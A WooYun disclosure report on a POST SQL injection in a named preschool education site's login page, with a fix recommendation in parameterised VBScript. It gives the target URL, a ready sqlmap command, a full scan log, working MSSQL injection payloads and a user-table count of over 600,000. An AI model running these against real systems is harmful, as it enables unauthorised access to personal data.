
Vulnerability Summary

Defect ID: wooyun-2015-0147543

Title: POST SQL injection in the Kaier Preschool Education Alliance website (600,000+ user records involved)

Vendor: 凯尔幼教联盟网 (Kaier Preschool Education Alliance)

Author: 路人甲

Submitted: 2015-10-19 09:43

Fix time: 2015-12-03 09:44

Disclosed: 2015-12-03 09:44

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-10-19: Actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public
2015-12-03: The vendor has actively ignored the vulnerability; details disclosed to the public

Summary:

POST SQL injection in the Kaier Preschool Education Alliance website (600,000+ user records involved)

Details:

Injection point:
http://www.krbb.cn/login/chklogin.asp
POST data: uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634
sqlmap command:
python sqlmap.py -u "http://www.krbb.cn/login/chklogin.asp" --data "uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634&leixing=1&mm=88952634"
sqlmap screenshot:

[screenshot: 1.jpg]


There are too many user tables; I checked one:
Database: www_krbb_cn
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| dbo.Dv_User | 612629  |
+-------------+---------+
Counting all users, it is certainly over a million.

Proof of vulnerability:

Full sqlmap run:

[11:21:38] [INFO] testing connection to the target URL
[11:21:38] [INFO] heuristics detected web page charset 'GB2312'
[11:21:39] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:21:40] [INFO] target URL is stable
[11:21:40] [INFO] testing if POST parameter 'uid' is dynamic
[11:21:41] [WARNING] POST parameter 'uid' does not appear dynamic
[11:21:41] [WARNING] heuristic (basic) test shows that POST parameter 'uid' might not be injectable
[11:21:41] [INFO] testing for SQL injection on POST parameter 'uid'
[11:21:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:21:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:21:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:21:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:21:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:21:49] [INFO] testing 'MySQL inline queries'
[11:21:49] [INFO] testing 'PostgreSQL inline queries'
[11:21:49] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:21:49] [INFO] testing 'Oracle inline queries'
[11:21:50] [INFO] testing 'SQLite inline queries'
[11:21:50] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:21:51] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[11:21:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:21:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:21:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:21:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:22:00] [INFO] testing 'Oracle AND time-based blind'
[11:22:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:22:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:22:23] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[11:22:40] [WARNING] POST parameter 'uid' is not injectable
[11:22:40] [INFO] testing if POST parameter 'pwd' is dynamic
[11:22:40] [WARNING] POST parameter 'pwd' does not appear dynamic
[11:22:40] [WARNING] heuristic (basic) test shows that POST parameter 'pwd' might not be injectable
[11:22:40] [INFO] testing for SQL injection on POST parameter 'pwd'
[11:22:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:22:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:22:47] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:22:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:22:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:22:54] [INFO] testing 'MySQL inline queries'
[11:22:54] [INFO] testing 'PostgreSQL inline queries'
[11:22:54] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:22:55] [INFO] testing 'Oracle inline queries'
[11:22:55] [INFO] testing 'SQLite inline queries'
[11:22:55] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:22:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[11:22:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:23:01] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:23:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:23:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:23:04] [INFO] testing 'Oracle AND time-based blind'
[11:23:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:23:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:23:42] [WARNING] POST parameter 'pwd' is not injectable
[11:23:42] [INFO] testing if POST parameter 'cookieexists' is dynamic
[11:23:43] [WARNING] POST parameter 'cookieexists' does not appear dynamic
[11:23:43] [WARNING] heuristic (basic) test shows that POST parameter 'cookieexists' might not be injectable
[11:23:43] [INFO] testing for SQL injection on POST parameter 'cookieexists'
[11:23:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:23:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:23:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:23:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:23:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:23:55] [INFO] testing 'MySQL inline queries'
[11:23:55] [INFO] testing 'PostgreSQL inline queries'
[11:23:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:23:56] [INFO] testing 'Oracle inline queries'
[11:23:56] [INFO] testing 'SQLite inline queries'
[11:23:56] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:23:59] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[11:24:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:24:03] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:24:05] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:24:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:24:09] [INFO] testing 'Oracle AND time-based blind'
[11:24:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:24:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:24:48] [WARNING] POST parameter 'cookieexists' is not injectable
[11:24:48] [INFO] testing if POST parameter 'yhm' is dynamic
[11:24:48] [WARNING] POST parameter 'yhm' does not appear dynamic
[11:24:48] [WARNING] heuristic (basic) test shows that POST parameter 'yhm' might not be injectable
[11:24:48] [INFO] testing for SQL injection on POST parameter 'yhm'
[11:24:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:24:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:24:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:24:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:24:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:24:59] [INFO] testing 'MySQL inline queries'
[11:24:59] [INFO] testing 'PostgreSQL inline queries'
[11:24:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:24:59] [INFO] testing 'Oracle inline queries'
[11:24:59] [INFO] testing 'SQLite inline queries'
[11:24:59] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:25:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[11:25:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:25:02] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:25:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:25:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:25:08] [INFO] testing 'Oracle AND time-based blind'
[11:25:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:25:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:25:50] [WARNING] POST parameter 'yhm' is not injectable
[11:25:50] [INFO] testing if POST parameter 'leixing' is dynamic
[11:25:50] [WARNING] POST parameter 'leixing' does not appear dynamic
[11:25:50] [WARNING] heuristic (basic) test shows that POST parameter 'leixing' might not be injectable
[11:25:51] [INFO] testing for SQL injection on POST parameter 'leixing'
[11:25:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:25:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:25:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:26:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:26:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:26:04] [INFO] testing 'MySQL inline queries'
[11:26:05] [INFO] testing 'PostgreSQL inline queries'
[11:26:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:26:05] [INFO] testing 'Oracle inline queries'
[11:26:06] [INFO] testing 'SQLite inline queries'
[11:26:06] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:26:08] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[11:26:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:26:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:26:12] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:26:13] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:26:14] [INFO] testing 'Oracle AND time-based blind'
[11:26:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:26:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:26:51] [WARNING] POST parameter 'leixing' is not injectable
[11:26:51] [INFO] testing if POST parameter 'mm' is dynamic
[11:26:51] [WARNING] POST parameter 'mm' does not appear dynamic
[11:26:51] [INFO] heuristic (basic) test shows that POST parameter 'mm' might be injectable (possible DBMS: 'Microsoft SQL Server')
[11:26:51] [INFO] testing for SQL injection on POST parameter 'mm'
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n]
[11:27:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:27:29] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
[11:27:29] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[11:27:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries'
[11:27:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:27:34] [INFO] POST parameter 'mm' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[11:27:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:27:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:28:15] [INFO] POST parameter 'mm' seems to be 'Microsoft SQL Server/Sybase stacked queries' injectable
[11:28:15] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:28:15] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[11:29:09] [INFO] POST parameter 'mm' seems to be 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)' injectable
[11:29:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:29:09] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:29:10] [WARNING] reflective value(s) found and filtering out
[11:29:10] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:29:11] [INFO] target URL appears to have 12 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[11:29:31] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
POST parameter 'mm' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 1285 HTTP(s) requests:
---
Parameter: mm (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634&leixing=1&mm=88952634' AND 3331=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (3331=3331) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(98)+CHAR(113))) AND 'NukJ'='NukJ

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634&leixing=1&mm=88952634'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634&leixing=1&mm=88952634' AND 5957=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'RLxS'='RLxS
---
[11:29:33] [INFO] testing Microsoft SQL Server
[11:29:33] [INFO] confirming Microsoft SQL Server
[11:29:34] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000

Fix recommendation:
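The sqlmap output above shows the login page (Classic ASP on IIS 6.0, Microsoft SQL Server 2000) splicing the `mm` field straight into a SQL string: a single quote closes the literal and lets error-based, stacked and time-based payloads run. As an added example that is not part of the original report nor the vendor's code, here is the same login lookup rewritten with ADO parameters so the request values are bound as typed data instead of SQL text. The field meanings (yhm = user name, mm = password, from the pinyin), the UserName/UserPassword columns of dbo.Dv_User and the connStr application variable are assumptions, not facts from the report.

```vbscript
<%
' Added example (not the vendor's chklogin.asp): parameterised login lookup.
' Assumptions: yhm = user name, mm = password, columns UserName/UserPassword
' in dbo.Dv_User, connection string stored in Application("connStr").
Option Explicit
Const adCmdText = 1, adParamInput = 1, adVarChar = 200

' The vulnerable pattern the sqlmap findings imply: request values concatenated into SQL.
'   sql = "SELECT UserID FROM dbo.Dv_User WHERE UserName='" & Request.Form("yhm") & _
'         "' AND UserPassword='" & Request.Form("mm") & "'"
' A quote in mm ends the string literal, so a value such as
' "'; WAITFOR DELAY '0:0:5'--" is executed as a second statement.

Function CheckLogin(connStr, yhm, mm)
    Dim conn, cmd, rs
    CheckLogin = False
    ' Reject empty or over-long input before touching the database; the limits match
    ' the parameter sizes below so nothing is silently truncated by the driver.
    If Len(yhm) = 0 Or Len(yhm) > 50 Or Len(mm) = 0 Or Len(mm) > 50 Then Exit Function

    Set conn = Server.CreateObject("ADODB.Connection")
    conn.Open connStr
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    ' The statement text contains only placeholders. ADO sends the values separately
    ' from the SQL, so quotes, semicolons and keywords inside mm are compared as
    ' characters of a password and are never parsed by SQL Server.
    cmd.CommandText = "SELECT UserID FROM dbo.Dv_User WHERE UserName = ? AND UserPassword = ?"
    cmd.Parameters.Append cmd.CreateParameter("@UserName", adVarChar, adParamInput, 50, yhm)
    cmd.Parameters.Append cmd.CreateParameter("@UserPassword", adVarChar, adParamInput, 50, mm)
    Set rs = cmd.Execute
    CheckLogin = Not rs.EOF
    rs.Close
    conn.Close
End Function

If CheckLogin(Application("connStr"), CStr(Request.Form("yhm")), CStr(Request.Form("mm"))) Then
    Response.Write "ok"
Else
    Response.Write "login failed"
End If
%>
```

The same parameter binding applies to every other value the page reads from the form (uid, pwd, leixing); concatenating any one of them reopens the injection.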

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability Response

Vendor response:

The vendor could not be contacted, or the vendor actively declined.

Vulnerability Rank: 15 (WooYun rating)